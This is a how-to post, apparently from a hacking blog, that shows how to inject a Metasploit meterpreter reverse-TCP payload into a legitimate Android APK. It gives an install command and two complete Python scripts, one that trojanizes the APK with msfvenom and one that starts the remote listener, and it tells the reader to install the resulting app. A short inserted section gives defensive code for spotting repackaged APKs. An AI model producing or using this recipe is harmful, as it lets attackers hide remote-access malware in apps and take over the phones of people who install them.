HOW TO INJECT MSF PAYLOAD INTO APK AND SETUP A LISTENER WITH JUST 2 SCRIPTS!! (I WROTE)

HERE IS THE GUIDE … ENJOY

WARNING !

  • DO NOT USE THIS METHOD FOR ANY ILLEGAL ACCESS (THAT CAN PUT U IN JAIL).
  • THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.
  • I’M NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITY YOU DO
  • YOU MUST HAVE WRITTEN PERMISSION TO USE IT ON ANYONE
  • USE IT AT UR OWN RISK

^READ THE WARNING BEFORE U CONTINUE^


WHAT WILL WE NEED

We will need

  • Metasploit (of course)
  • apktool
  • default-jdk
  • default-jre
  • zipalign
  • Python3
  • THE 2 SCRIPTS I WROTE
  • THE APK FILE THAT THE PAYLOAD WILL BE INJECTED INTO
  • Ngrok (if u want to use the apk outside the local network)

INSTALL EVERYTHING

Run this command in the terminal to install everything:

sudo apt update && sudo apt upgrade -y && sudo apt install metasploit-framework apktool default-jdk default-jre zipalign python3 -y

If you want to use the APK outside the local network, use ngrok (if you don’t know how to set it up, I’ve got you covered: I wrote a post about that HERE).

DOWNLOAD THE SCRIPTS

First, download the two scripts (an injector and a listener):

FOR THE INJECTOR CLICK HERE

FOR THE LISTENER CLICK HERE

THE TWO FILES IN AN ARCHIVE HERE




RUN THE SCRIPTS

OPEN A TERMINAL, CHANGE THE DIRECTORY TO THE DOWNLOADS FOLDER AND TYPE THIS IN THE TERMINAL:

python3 MSAPI_injector.py

and give it the required info

Path to original apk file : PATH.apk
LHOST (attacker local ip) : IP
LPORT (attacker local open port) : PORT
Path to save the injected apk : HERE.apk

That is how simple it is: you now have the payload.

NOW RUN THE LISTENER

python3 MSAPL_listener.py

and give it the required info

LHOST (default 0.0.0.0) : ip
lhost = ip
LPORT (default 4444) : port
lport = port

NOW INSTALL THE APK AND UR IN
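
Seen from the defender's side, the APK produced above is a repackaged build: its code and manifest no longer match the genuine release, and it cannot carry the original developer's signature. The following is an added example (not part of the original post or its two scripts) that compares a suspect APK with a trusted copy of the same version, entry by entry; the function names and the in-memory sample archives are constructed for illustration.

```python
import hashlib
import io
import zipfile

# Entries whose change means the code, declared permissions or signer differ.
SENSITIVE_PREFIXES = ("classes", "AndroidManifest.xml", "META-INF/")


def entry_hashes(apk_bytes):
    """Map every entry name in an APK (a ZIP archive) to its SHA-256 digest."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        return {name: hashlib.sha256(apk.read(name)).hexdigest()
                for name in apk.namelist()}


def diff_apks(trusted_bytes, suspect_bytes):
    """Return entries added, removed or changed in the suspect APK."""
    trusted, suspect = entry_hashes(trusted_bytes), entry_hashes(suspect_bytes)
    return {
        "added": sorted(set(suspect) - set(trusted)),
        "removed": sorted(set(trusted) - set(suspect)),
        "changed": sorted(n for n in trusted.keys() & suspect.keys()
                          if trusted[n] != suspect[n]),
    }


def is_repackaged(report):
    """True when any code, manifest or signature entry differs."""
    touched = report["added"] + report["removed"] + report["changed"]
    return any(name.startswith(SENSITIVE_PREFIXES) for name in touched)


def build_sample(entries):
    """Build a constructed in-memory ZIP standing in for an APK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed sample data, not real APK contents.
GENUINE = build_sample({"AndroidManifest.xml": b"perm:INTERNET",
                        "classes.dex": b"app-code",
                        "META-INF/CERT.RSA": b"developer-signature",
                        "res/icon.png": b"icon"})
SUSPECT = build_sample({"AndroidManifest.xml": b"perm:INTERNET,READ_SMS",
                        "classes.dex": b"app-code+extra",
                        "META-INF/SIGNER.RSA": b"other-signature",
                        "res/icon.png": b"icon"})

if __name__ == "__main__":
    report = diff_apks(GENUINE, SUSPECT)
    print(report, "repackaged:", is_repackaged(report))
```

APKs signed only with the v2/v3 schemes keep their signature outside the ZIP entries, so for the authoritative signer check compare the certificate digests printed by `apksigner verify --print-certs` for both files.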


BONUS :

  • PYTHON INJECTOR SCRIPT
#-------------------------------------------
# This python script lets you inject payload 
# into apk using Msfvenom 
# made with love 🙂
# Znqr Ol QnExGbAr
# ROT13
# 
# //    //  //
# //    //     
# ////////  //
# //    //  //
# //    //  //
#-------------------------------------------


#----------------------
# importing libs
#----------------------


import os


#----------------------
# warning
#----------------------


print("MSAPI (MetaSploit Android Payload Injector)")
print(" ")
print("Note That You Must Have Metasploit And Apktool Installed ,")
print("  And Must Have Root Privileges To Use This Tool ")
print(" ")


#----------------------
# getting info
#----------------------


apk_original = input("Path to original apk file : ")

lhost = input("LHOST (attacker local ip) : ")

lport = input("LPORT (attacker local open port) : ")

apk_injected = input("Path to save the injected apk : ")


#----------------------
# saving the command
#----------------------


command = "sudo msfvenom -x " + apk_original + " -p android/meterpreter/reverse_tcp LHOST=" + lhost + " LPORT=" + lport + " -o " + apk_injected

print(" ")
print("Please Wait Up To 5 Minutes")
print(" ")


#----------------------
# executing
#----------------------


os.system(command)


#----------------------
# after executing 
#----------------------


print(" ")
print("Please Support Me If That Worked, if u know me ;)")
print("And Dont Forget, DECODE The CODE And Read The Source CODE")


#----
#BYE
#----

  • PYTHON LISTENER SCRIPT
#--------------------------------------------
# This python script lets you open a listener
# using metasploit for the payload u created
# made with love 🙂
# Znqr Ol QnExGbAr
# ROT13
# 
# //    //  //
# //    //     
# ////////  //
# //    //  //
# //    //  //
#--------------------------------------------


#----------------------
# importing libs
#----------------------


import os


#----------------------
# warning
#----------------------


print("MSAPL (MetaSploit Android Payload Listener)")
print(" ")
print("Note That You Must Have Metasploit Installed and have a payload to use this script ,")
print(" ")


#----------------------
# getting and checking info
#----------------------


lhost = input("LHOST (default 0.0.0.0) : ")

if(lhost == ''):
	lhost = "0.0.0.0"
else:
	lhost = lhost
print("lhost = " + lhost)


lport = input("LPORT (default 4444) : ")

if(lport == ''):
	lport = "4444"
else:
	lport = lport
print("lport = " + lport)


#----------------------
# command
#----------------------


command = 'msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost  ' + lhost + '; set lport ' + lport + '; exploit"'


#----------------------
# Done
#----------------------


print(" ")
print("Please Support Me If That Works, if u know me ;)")
print("And Dont Forget, DECODE The CODE And Read The Source CODE")
print(" ")
print("PLEASE WAIT UP TO 5 MINUTES(UR COMPUTER MAY BE SLOW)")
print(" ")


#----------------------
# executing
#----------------------

os.system(command)

# BYE

AS I PROMISED HERE IS THE WAY

Hope i helped u all

Stay Tuned 😀
